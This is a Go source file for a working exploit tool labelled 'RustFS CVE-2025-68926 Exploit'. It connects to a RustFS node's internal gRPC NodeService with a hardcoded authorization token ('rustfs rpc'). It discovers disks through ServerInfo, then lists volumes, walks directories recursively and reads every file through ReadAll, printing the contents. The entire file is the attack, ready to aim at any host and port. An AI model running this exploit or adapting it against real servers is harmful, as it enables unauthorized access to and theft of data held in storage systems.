package main

import (
	"bytes"
	"context"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"log"
	"os"
	"strings"
	"sync"
	"time"

	"github.com/fullstorydev/grpcurl"
	"github.com/golang/protobuf/proto"
	"github.com/jhump/protoreflect/desc"
	"github.com/jhump/protoreflect/desc/builder"
	"github.com/vmihailenco/msgpack/v5"
	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials/insecure"
	"google.golang.org/grpc/metadata"
	"google.golang.org/grpc/status"
)

const (
	hardcodedToken = "rustfs rpc"
	maxDepth       = 10
)

type Exploit struct {
	conn   *grpc.ClientConn
	source grpcurl.DescriptorSource
	ctx    context.Context
}

type responseHandler struct {
	mu       sync.Mutex
	response proto.Message
	err      error
	done     chan struct{}
	closed   bool
}

func createDescriptorSource() (grpcurl.DescriptorSource, error) {
	errorMsg := builder.NewMessage("Error").
		AddField(builder.NewField("code", builder.FieldTypeUInt32())).
		AddField(builder.NewField("error_info", builder.FieldTypeString()))

	serverInfoReq := builder.NewMessage("ServerInfoRequest").
		AddField(builder.NewField("metrics", builder.FieldTypeBool()))
	serverInfoResp := builder.NewMessage("ServerInfoResponse").
		AddField(builder.NewField("success", builder.FieldTypeBool())).
		AddField(builder.NewField("server_properties", builder.FieldTypeBytes())).
		AddField(builder.NewField("error_info", builder.FieldTypeString()))

	listVolumesReq := builder.NewMessage("ListVolumesRequest").
		AddField(builder.NewField("disk", builder.FieldTypeString()))
	listVolumesResp := builder.NewMessage("ListVolumesResponse").
		AddField(builder.NewField("success", builder.FieldTypeBool())).
		AddField(builder.NewField("volume_infos", builder.FieldTypeString()).SetRepeated()).
		AddField(builder.NewField("error", builder.FieldTypeMessage(errorMsg)))

	listDirReq := builder.NewMessage("ListDirRequest").
		AddField(builder.NewField("disk", builder.FieldTypeString())).
		AddField(builder.NewField("volume", builder.FieldTypeString())).
		AddField(builder.NewField("dir_path", builder.FieldTypeString())).
		AddField(builder.NewField("count", builder.FieldTypeInt32()))
	listDirResp := builder.NewMessage("ListDirResponse").
		AddField(builder.NewField("success", builder.FieldTypeBool())).
		AddField(builder.NewField("volumes", builder.FieldTypeString()).SetRepeated()).
		AddField(builder.NewField("error", builder.FieldTypeMessage(errorMsg)))

	readAllReq := builder.NewMessage("ReadAllRequest").
		AddField(builder.NewField("disk", builder.FieldTypeString())).
		AddField(builder.NewField("volume", builder.FieldTypeString())).
		AddField(builder.NewField("path", builder.FieldTypeString()))
	readAllResp := builder.NewMessage("ReadAllResponse").
		AddField(builder.NewField("success", builder.FieldTypeBool())).
		AddField(builder.NewField("data", builder.FieldTypeBytes())).
		AddField(builder.NewField("error", builder.FieldTypeMessage(errorMsg)))

	file, err := builder.NewFile("node.proto").SetPackageName("node_service").
		AddMessage(errorMsg).
		AddMessage(serverInfoReq).
		AddMessage(serverInfoResp).
		AddMessage(listVolumesReq).
		AddMessage(listVolumesResp).
		AddMessage(listDirReq).
		AddMessage(listDirResp).
		AddMessage(readAllReq).
		AddMessage(readAllResp).
		AddService(builder.NewService("NodeService").
			AddMethod(builder.NewMethod("ServerInfo",
				builder.RpcTypeMessage(serverInfoReq, false),
				builder.RpcTypeMessage(serverInfoResp, false),
			)).
			AddMethod(builder.NewMethod("ListVolumes",
				builder.RpcTypeMessage(listVolumesReq, false),
				builder.RpcTypeMessage(listVolumesResp, false),
			)).
			AddMethod(builder.NewMethod("ListDir",
				builder.RpcTypeMessage(listDirReq, false),
				builder.RpcTypeMessage(listDirResp, false),
			)).
			AddMethod(builder.NewMethod("ReadAll",
				builder.RpcTypeMessage(readAllReq, false),
				builder.RpcTypeMessage(readAllResp, false),
			)),
		).Build()
	if err != nil {
		return nil, fmt.Errorf("failed to build descriptors: %w", err)
	}
	source, err := grpcurl.DescriptorSourceFromFileDescriptors(file)
	if err != nil {
		return nil, fmt.Errorf("failed to create descriptor source: %w", err)
	}
	return source, nil
}

func NewExploit(host, port string) (*Exploit, error) {
	address := fmt.Sprintf("%s:%s", host, port)
	conn, err := grpc.Dial(address, grpc.WithTransportCredentials(insecure.NewCredentials()))
	if err != nil {
		return nil, fmt.Errorf("failed to connect: %w", err)
	}

	ctx := metadata.NewOutgoingContext(context.Background(), metadata.Pairs("authorization", hardcodedToken))

	source, err := createDescriptorSource()
	if err != nil {
		conn.Close()
		return nil, fmt.Errorf("failed to create descriptor source: %w", err)
	}

	return &Exploit{conn: conn, source: source, ctx: ctx}, nil
}

func (e *Exploit) Close() {
	if e.conn != nil {
		e.conn.Close()
	}
}

func (h *responseHandler) OnResolveMethod(*desc.MethodDescriptor) {}
func (h *responseHandler) OnSendHeaders(metadata.MD)              {}
func (h *responseHandler) OnReceiveHeaders(metadata.MD)           {}

func (h *responseHandler) OnReceiveResponse(msg proto.Message) {
	h.mu.Lock()
	defer h.mu.Unlock()
	h.response = msg
	if !h.closed {
		close(h.done)
		h.closed = true
	}
}

func (h *responseHandler) OnReceiveTrailers(s *status.Status, md metadata.MD) {
	h.mu.Lock()
	defer h.mu.Unlock()
	if s.Code() != 0 {
		h.err = s.Err()
	}
	if !h.closed {
		close(h.done)
		h.closed = true
	}
}

func (e *Exploit) callMethod(methodName string, reqJSON string) (map[string]interface{}, error) {
	handler := &responseHandler{done: make(chan struct{})}
	reqData := bytes.NewReader([]byte(reqJSON))
	parser, formatter, err := grpcurl.RequestParserAndFormatterFor(grpcurl.FormatJSON, e.source, true, true, reqData)
	if err != nil {
		return nil, fmt.Errorf("failed to create parser: %w", err)
	}

	headers := []string{fmt.Sprintf("authorization: %s", hardcodedToken)}
	requestSupplier := func(msg proto.Message) error { return parser.Next(msg) }
	fullMethodName := fmt.Sprintf("node_service.NodeService/%s", methodName)

	if err := grpcurl.InvokeRPC(e.ctx, e.source, e.conn, fullMethodName, headers, handler, requestSupplier); err != nil {
		return nil, fmt.Errorf("gRPC call failed: %w", err)
	}

	<-handler.done
	if handler.err != nil {
		return nil, handler.err
	}
	if handler.response == nil {
		return nil, fmt.Errorf("no response received")
	}

	formatted, err := formatter(handler.response)
	if err != nil {
		return nil, fmt.Errorf("failed to format response: %w", err)
	}

	var result map[string]interface{}
	if err := json.Unmarshal([]byte(formatted), &result); err != nil {
		return nil, fmt.Errorf("failed to parse response: %w", err)
	}

	return result, nil
}

func (e *Exploit) ServerInfo() error {
	fmt.Println("\n[+] Testing ServerInfo...")
	resp, err := e.callMethod("ServerInfo", `{"metrics": true}`)
	if err != nil {
		return err
	}

	if !getBool(resp, "success") {
		return fmt.Errorf("ServerInfo returned success=false")
	}

	serverProps := getString(resp, "serverProperties")
	if serverProps == "" {
		return fmt.Errorf("invalid serverProperties")
	}

	data, err := base64.StdEncoding.DecodeString(serverProps)
	if err != nil {
		return nil
	}

	var decoded interface{}
	if err := msgpack.Unmarshal(data, &decoded); err != nil {
		return nil
	}

	fmt.Println("[+] ServerInfo decoded:")
	printJSON(decoded)
	return nil
}

func (e *Exploit) DiscoverDisks() ([]string, error) {
	fmt.Println("\n[+] Discovering disks from ServerInfo...")
	resp, err := e.callMethod("ServerInfo", `{"metrics": true}`)
	if err != nil {
		return e.defaultDisks(), nil
	}

	if !getBool(resp, "success") {
		return e.defaultDisks(), nil
	}

	serverProps := getString(resp, "serverProperties")
	if serverProps == "" {
		return e.defaultDisks(), nil
	}

	data, err := base64.StdEncoding.DecodeString(serverProps)
	if err != nil {
		return e.defaultDisks(), nil
	}

	var decoded interface{}
	if err := msgpack.Unmarshal(data, &decoded); err != nil {
		return e.defaultDisks(), nil
	}

	disks := extractDisks(decoded)
	if len(disks) == 0 {
		return e.defaultDisks(), nil
	}

	fmt.Printf("[+] Discovered %d disks:\n", len(disks))
	for _, disk := range disks {
		fmt.Printf("  - %s\n", disk)
	}
	return disks, nil
}

func (e *Exploit) defaultDisks() []string {
	return []string{"/data/rustfs0", "/data/rustfs1", "/data/rustfs2", "/data/rustfs3"}
}

func extractDisks(data interface{}) []string {
	arr, ok := data.([]interface{})
	if !ok || len(arr) < 8 {
		return nil
	}

	diskList, ok := arr[7].([]interface{})
	if !ok {
		return nil
	}

	var disks []string
	for _, diskInfo := range diskList {
		diskArr, ok := diskInfo.([]interface{})
		if !ok || len(diskArr) == 0 {
			continue
		}
		if diskPath, ok := diskArr[0].(string); ok && diskPath != "" {
			disks = append(disks, diskPath)
		}
	}
	return disks
}

func (e *Exploit) ListVolumes(disk string) ([]string, error) {
	resp, err := e.callMethod("ListVolumes", fmt.Sprintf(`{"disk": "%s"}`, disk))
	if err != nil {
		return nil, err
	}

	if !getBool(resp, "success") {
		return nil, fmt.Errorf("ListVolumes returned success=false")
	}

	volInfos, ok := resp["volumeInfos"].([]interface{})
	if !ok {
		return nil, fmt.Errorf("invalid volumeInfos type")
	}

	var volumes []string
	for _, volInfo := range volInfos {
		volStr, ok := volInfo.(string)
		if !ok {
			continue
		}
		var volData map[string]interface{}
		if err := json.Unmarshal([]byte(volStr), &volData); err != nil {
			continue
		}
		if name, ok := volData["name"].(string); ok {
			volumes = append(volumes, name)
		}
	}
	return volumes, nil
}

func (e *Exploit) ListDir(disk, volume, dirPath string) ([]string, error) {
	reqJSON := fmt.Sprintf(`{"disk": "%s", "volume": "%s", "dirPath": "%s", "count": 1000}`, disk, volume, dirPath)
	resp, err := e.callMethod("ListDir", reqJSON)
	if err != nil {
		return nil, err
	}

	if !getBool(resp, "success") {
		return nil, fmt.Errorf("ListDir returned success=false")
	}

	volumes, ok := resp["volumes"].([]interface{})
	if !ok {
		return nil, fmt.Errorf("invalid volumes type")
	}

	var result []string
	for _, vol := range volumes {
		if volStr, ok := vol.(string); ok {
			result = append(result, volStr)
		}
	}
	return result, nil
}

func (e *Exploit) ReadAll(disk, volume, path string) ([]byte, error) {
	reqJSON := fmt.Sprintf(`{"disk": "%s", "volume": "%s", "path": "%s"}`, disk, volume, path)
	resp, err := e.callMethod("ReadAll", reqJSON)
	if err != nil {
		return nil, err
	}

	if !getBool(resp, "success") {
		return nil, fmt.Errorf("ReadAll returned success=false")
	}

	data, ok := resp["data"].(string)
	if !ok {
		return nil, fmt.Errorf("invalid data type")
	}

	decoded, err := base64.StdEncoding.DecodeString(data)
	if err != nil {
		return []byte(data), nil
	}

	return decoded, nil
}

func (e *Exploit) ExploreDirectory(disk, volume, dirPath string, depth, maxDepth int) {
	if depth >= maxDepth {
		return
	}

	indent := strings.Repeat("  ", depth)
	displayPath := dirPath
	if displayPath == "" {
		displayPath = "/"
	}
	fmt.Printf("%s[*] Exploring: %s%s\n", indent, volume, displayPath)

	items, err := e.ListDir(disk, volume, dirPath)
	if err != nil {
		fmt.Printf("%s[-] Failed to list directory: %v\n", indent, err)
		return
	}

	for _, item := range items {
		if item == "" {
			continue
		}

		isDir := strings.HasSuffix(item, "/")
		item = strings.TrimSuffix(item, "/")
		fullPath := item
		if dirPath != "" {
			fullPath = fmt.Sprintf("%s/%s", dirPath, item)
		}

		if isDir {
			e.ExploreDirectory(disk, volume, fullPath, depth+1, maxDepth)
		} else {
			fmt.Printf("%s[+] File: %s\n", indent, fullPath)
			data, err := e.ReadAll(disk, volume, fullPath)
			if err != nil {
				fmt.Printf("%s  [-] Failed to read: %v\n", indent, err)
				continue
			}

			if len(data) == 0 {
				fmt.Printf("%s  [Empty]\n", indent)
				continue
			}

			var jsonData interface{}
			if err := json.Unmarshal(data, &jsonData); err == nil {
				printJSONIndent(jsonData, indent+"    ")
			} else {
				fmt.Printf("%s  Size: %d bytes\n", indent, len(data))
			}
		}
	}
}

func (e *Exploit) ExploreAllDisks(disks []string) {
	fmt.Println("\n======================================================================")
	fmt.Println("Recursive Directory Exploration")
	fmt.Println("======================================================================")

	for _, disk := range disks {
		fmt.Printf("\n[*] Processing disk: %s\n", disk)
		volumes, err := e.ListVolumes(disk)
		if err != nil {
			log.Printf("Failed to list volumes on %s: %v", disk, err)
			continue
		}

		for _, volume := range volumes {
			fmt.Printf("[*] Exploring volume: %s on %s\n", volume, disk)
			e.ExploreDirectory(disk, volume, "", 0, maxDepth)
		}
	}
}

func getBool(m map[string]interface{}, key string) bool {
	val, ok := m[key].(bool)
	return ok && val
}

func getString(m map[string]interface{}, key string) string {
	val, ok := m[key].(string)
	if !ok {
		return ""
	}
	return val
}

func printJSON(data interface{}) {
	printJSONIndent(data, "")
}

func printJSONIndent(data interface{}, indent string) {
	jsonBytes, err := json.MarshalIndent(data, "", "  ")
	if err != nil {
		fmt.Printf("%s%+v\n", indent, data)
		return
	}

	lines := strings.Split(string(jsonBytes), "\n")
	maxLines := 30
	for i, line := range lines {
		if i >= maxLines {
			fmt.Printf("%s... (%d more lines)\n", indent, len(lines)-i)
			break
		}
		fmt.Printf("%s%s\n", indent, line)
	}
}

func main() {
	if len(os.Args) < 3 {
		fmt.Fprintf(os.Stderr, "Usage: %s <host> <port>\n", os.Args[0])
		os.Exit(1)
	}

	host := os.Args[1]
	port := os.Args[2]

	fmt.Println("======================================================================")
	fmt.Println("         RustFS CVE-2025-68926 Exploit")
	fmt.Println("======================================================================")
	fmt.Printf("[*] Target: %s:%s\n", host, port)
	fmt.Printf("[*] Token: '%s'\n", hardcodedToken)
	fmt.Printf("[*] Timestamp: %s\n", time.Now().Format("2006-01-02 15:04:05"))

	exploit, err := NewExploit(host, port)
	if err != nil {
		log.Fatalf("Failed to create exploit: %v", err)
	}
	defer exploit.Close()

	if err := exploit.ServerInfo(); err != nil {
		log.Printf("ServerInfo error: %v", err)
	}

	disks, err := exploit.DiscoverDisks()
	if err != nil {
		log.Fatalf("Failed to discover disks: %v", err)
	}

	exploit.ExploreAllDisks(disks)

	fmt.Println("\n======================================================================")
	fmt.Println("Exploitation Complete")
	fmt.Println("======================================================================")
}
